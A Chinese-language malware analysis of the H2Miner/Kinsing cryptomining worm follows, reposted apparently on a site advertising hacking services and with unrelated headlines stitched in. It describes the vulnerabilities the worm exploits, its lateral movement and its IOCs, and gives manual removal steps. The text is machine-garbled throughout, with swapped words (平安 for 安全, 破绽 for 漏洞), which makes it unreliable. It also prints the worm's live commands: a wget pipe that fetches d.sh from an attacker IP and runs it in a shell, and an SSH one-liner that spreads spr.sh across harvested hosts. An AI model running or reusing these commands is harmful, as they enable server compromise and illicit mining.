黑客业务

黑客服务,入侵网站,网站入侵,黑客技术,信息安全,web安全

黑客缺德,Linux服务器遭遇挖矿蠕虫攻击,已有数千台服务器中招


LaoXinWon携带两个勒索病毒样本,重复加密或增加解密难度

【文章摘要】 腾讯平安威胁情报中心捕捉H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危破绽入侵Linux系统,并行使破绽在企业内网或云服务器中横向扩散。腾讯平安威胁情报中心预估已有数千台服务器中招,腾讯平安专家建议相关企业尽快排查服务器被入侵的情形,实时消灭H2Miner挖矿蠕虫病毒。

一、概述

腾讯平安威胁情报中心捕捉H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危破绽入侵Linux系统,并行使破绽在企业内网或云服务器中横向扩散。腾讯平安威胁情报中心预估已有数千台服务器中招,腾讯平安专家建议相关企业尽快排查服务器被入侵的情形,实时消灭H2Miner挖矿蠕虫病毒。

腾讯平安威胁情报中心本次捕捉的H2Miner挖矿蠕虫样本会下载恶意剧本及恶意程序举行挖矿牟利,横向扫描扩大攻击面并维持与远程服务器(C2)通讯,令服务器酿成黑客控制的肉鸡。同时,具有卸载云服务器平安软件、删除云服务器镜像的能力,会给企业云服务器平安带来严重影响。

H2Miner挖矿蠕虫行使的高危破绽包罗:

Redis未授权RCE

Solr dataimport RCE(CVE-2019-0193)

Hadoop Yarn REST API未授权RCE(CVE-2017-15718)

Docker Remote API未授权RCE

ThinkPHP5 RCE

Confluence未授权RCE(CVE-2019-3396)

SaltStack RCECVE-2020-11651

等多个Web应用破绽。

此次H2Miner变种更新了C2服务器地址,在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目的机械和认证信息,并行使搜索获得的userlisthostlistkeylistsshports举行组合实验爆破上岸,从而扩大其攻击局限。


二、样本剖析

Docker是一个开源的应用容器引擎,开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后公布到任何盛行的LINUX机械上,也可以实现虚拟化。Docker swarmdocker官方提供,是一个将docker集群酿成单一虚拟的docker host工具,使用尺度的Docker API,能够利便docker集群的治理和扩展。使用docker swarm的时刻,治理的docker节点上会开放一个TCP端口2375(或2376)。

攻击者行使未受珍爱的开放Docker API端口举行攻击,并执行恶意下令:

wget -q -O – http[:]//93.189.43.3/d.sh | sh

d.sh执行以下操作:

1.禁用SELINUX并消灭系统日志:echo SELINUX=disabled >/etc/selinux/config

2.卸载阿里云骑士和腾讯云镜;

3.消灭竞品挖矿木马;

4.杀死正在运行的恶意Docker容器并删除它们的映像;

5.下载恶意程序“kinsing”并运行;

6.通过crontab准时义务每分钟下载和执行shell剧本;

7.删除竞品挖矿木马的crontab准时义务。

下载获得的kinsing接纳Golang编写,被编译为Linux平台可执行程序,主要有以下功效:

1.下载文件并执行;

2.启动和维持挖矿程序;

3.C&C服务器通讯,吸收并执行远程下令;

3.行使masscan对外扫描;

4.针对redis服务举行爆破攻击;

5.下载shell剧本http[:]//93.189.43.3/spre.sh,以举行横向移动。


受影响的主机遇以http的方式与C&C服务器185.154.53.140举行通讯,其中肉鸡的信息在http头部中标识。


Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi,然后启动毗邻矿池xmr-eu1.nanopool.org挖矿,设置中使用门罗币钱包为:

46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

挖矿使用矿池和钱包与腾讯平安此前捕捉到的版本(H2Miner黑产团伙行使SaltStack破绽入侵企业主机挖矿,已赢利370万元https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q)中使用的相同。




横向移动

Spre.sh是用于在网络中横向流传H2Minershell剧本。为了发现攻击目的并找与其相对应的身份验证的信息,剧本会从/.ssh/config, .bash_history, /.ssh/known_hosts举行搜索和匹配。

行使收集到的信息,恶意剧本实验通过SSH毗邻到每个主机,使用每个可能的用户和密钥组合举行爆破上岸,以便在网络中的其他主机或容器上下载和运行shell剧本Spr.shspr.sh与最初攻击时的d.sh相同。

以下SSH下令用于在网络中流传H2Miner

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"


三、手动消灭H2Miner建议

1、查找路径为/tmp/kinsing/tmp/kinsing2/tmp/kdevtmpfsi的历程,将其kill掉并删除对应的文件;

2、查找crontab义务中包罗“195.3.146.118”的相关项并删除。


IOCs

IP

195.3.146.118

142.44.191.122

PyPI 官方仓库遭request恶意包投毒,攻击行为严重威胁linux服务器安全

185.92.74.42

217.12.221.244

93.189.43.3

185.154.53.140

Md5

kdevtmpfsi

8c6681daba966addd295ad89bf5146af

kinsing

52ca5bc47c84a748d2b349871331d36a

a.sh

e3af308c4a4130dd77dc5772d801ebab

cron.sh

bd405b37e69799492a58a50f5efc2725

d.sh

be17040e1a4eaf7e2df8c0273ff2dfd2

ex.sh

7f469ccecbf9d0573f0efd456e8e63a7

h2.sh

1b34c5bb3a06c4439b5da77c49f14cf7

j.sh

41640173ddb6a207612ee052b48dd8be

lf.sh

bac660c7aa23f4fda6c699c75b4b89f1

p.sh

e040303652c05dbf6469c9c3ce68031a

pa.sh

18dc6621299b855793bdeaad8ef5af23

s.sh

1c489a326a4d37fbf02680bbd6f38b4f

spr.sh

255779cf6134f3ac5133f04868e3956c

spre.sh

639d87d54aa57371cc0bf82409503311

t.sh

ae9017bbeac57bc4de1ac5f59d59c519

tf.sh

831093a5a825ab096c2fc73a7a52bbf1

al.sh

d06e2a3f52043c3a3c3ecf1f406b8241

URL

https[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing

https[:]//bitbucket.org/tromdiga1/git/raw/master/for

http[:]//93.189.43.3/kinsing

http[:]//93.189.43.3/kinsing2

http[:]//93.189.43.3/spr.sh

http[:]//93.189.43.3/spre.sh

http[:]//93.189.43.3/a.sh

http[:]//93.189.43.3/cron.sh

http[:]//93.189.43.3/d.sh

http[:]//93.189.43.3/ex.sh

http[:]//93.189.43.3/h2.sh

http[:]//93.189.43.3/j.sh

http[:]//93.189.43.3/lf.sh

http[:]//93.189.43.3/p.sh

http[:]//93.189.43.3/pa.sh

http[:]//93.189.43.3/s.sh

http[:]//93.189.43.3/t.sh

http[:]//93.189.43.3/tf.sh

http[:]//93.189.43.3/al.sh

参考链接:

http://blog.nsfocus.net/docker-remote-api-unauthorized-access-vulnerability/

H2Miner黑产团伙行使SaltStack破绽入侵企业主机挖矿,已赢利370万元

https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q


宝塔面板发布紧急安全更新,腾讯安全全面检测


  • 评论列表:
  •  冢渊不矜
     发布于 2022-05-27 14:04:04  回复该评论
  • LaoXinWon携带两个勒索病毒样本,重复加密或增加解密难度【文章摘要】 腾讯平安威胁情报中心捕捉H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危破绽入侵Linux系统
  •  拥嬉青朷
     发布于 2022-05-27 07:39:37  回复该评论
  • 使用docker swarm的时刻,治理的docker节点上会开放一个TCP端口2375(或2376)。 攻击者行使未受珍爱的开放Docker API端口举行攻击,并执行恶意下令: wget -q -O – http[:]//93.
  •  南殷卮留
     发布于 2022-05-27 11:39:57  回复该评论
  • inux下的大型挖矿僵尸网络,已被发现通过多个高危破绽入侵Linux系统,并行使破绽在企业内网或云服务器中横向扩散。腾讯平安威胁情报中心预估已有数千台服务器中招,腾讯平安专家建议相关企业尽快排查服务器被入侵的情形,实时消灭H2Miner挖矿蠕虫病毒。

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.